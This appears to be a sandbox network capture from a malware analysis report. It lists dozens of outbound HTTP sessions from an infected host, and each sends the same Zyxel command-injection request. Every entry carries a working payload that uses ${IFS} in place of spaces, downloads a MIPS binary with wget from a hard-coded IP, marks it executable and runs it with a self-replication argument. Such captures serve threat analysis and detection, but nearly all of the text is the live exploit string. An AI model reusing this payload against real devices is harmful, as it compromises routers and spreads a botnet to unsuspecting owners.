                                            Jan 14, 2024 15:50:48.612936974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6838192.168.2.234379080.188.80.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612993956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6839192.168.2.2342512104.175.180.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613002062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6840192.168.2.2348418166.175.105.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613049030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6841192.168.2.2337282206.182.53.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613079071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6842192.168.2.234076099.238.20.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613080978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6843192.168.2.233961894.124.34.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613136053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6844192.168.2.2360214163.95.141.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613153934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6845192.168.2.2358428220.56.208.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613193035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6846192.168.2.2348806179.250.54.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613204956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6847192.168.2.2356674160.52.232.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613234043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6848192.168.2.2357952138.59.252.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613260984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6849192.168.2.2344500116.9.115.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613296032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6850192.168.2.235309698.194.147.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613312006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6851192.168.2.2339438200.198.9.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613358974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6852192.168.2.2333510191.199.189.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613378048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6853192.168.2.235734676.158.106.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613411903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6854192.168.2.2341426141.46.90.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613446951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6855192.168.2.2355254222.44.252.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613460064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6856192.168.2.234121425.205.37.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613496065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6857192.168.2.233596864.58.226.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613523006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6858192.168.2.2337768178.219.44.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613555908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6859192.168.2.2352834165.60.245.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613571882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6860192.168.2.2337812213.196.180.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613599062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6861192.168.2.2344448173.72.243.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613636971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6862192.168.2.234003875.252.133.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613663912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6863192.168.2.235220672.129.186.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613707066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6864192.168.2.2339384177.150.75.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613733053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6865192.168.2.235218862.21.207.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613743067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6866192.168.2.2348892111.151.103.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613780975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6867192.168.2.233278218.19.61.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613827944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6868192.168.2.2359996219.3.152.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613858938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6869192.168.2.235857445.76.48.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613884926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6870192.168.2.234760838.206.38.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613930941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6871192.168.2.2341164188.38.229.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613935947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6872192.168.2.2354554180.195.37.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613940954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6873192.168.2.2348898220.95.246.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613961935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6874192.168.2.2344994160.35.243.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.613976002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6875192.168.2.2336642161.151.138.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614012957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6876192.168.2.23568028.230.220.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614044905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6877192.168.2.2356432187.126.221.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614063025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6878192.168.2.235367484.110.183.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614130020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6879192.168.2.23353641.37.235.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614151955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6880192.168.2.233882017.201.98.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614200115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6881192.168.2.2360694210.126.231.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614214897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6882192.168.2.233666460.117.212.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614243031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6883192.168.2.234301490.25.42.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614280939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6884192.168.2.2344334197.31.181.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614324093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6885192.168.2.2338336193.179.93.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614332914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6886192.168.2.233573247.226.54.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614353895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6887192.168.2.2356106205.76.92.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614424944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6888192.168.2.2340566171.82.51.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614460945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6889192.168.2.2333216147.81.246.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614486933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6890192.168.2.2351034111.30.38.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614516020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6891192.168.2.23547101.225.38.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614528894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6892192.168.2.2336532168.3.151.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614583015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6893192.168.2.2341924165.196.81.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614631891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6894192.168.2.235675296.163.225.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614655018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6895192.168.2.2333344223.206.145.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614677906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6896192.168.2.2356816192.36.89.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614712000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6897192.168.2.2355916146.79.224.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614742994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6898192.168.2.2353126134.46.156.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614754915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6899192.168.2.2340254206.169.28.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614788055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6900192.168.2.2357416196.154.196.239443
                                            TimestampBytes transferredDirectionData
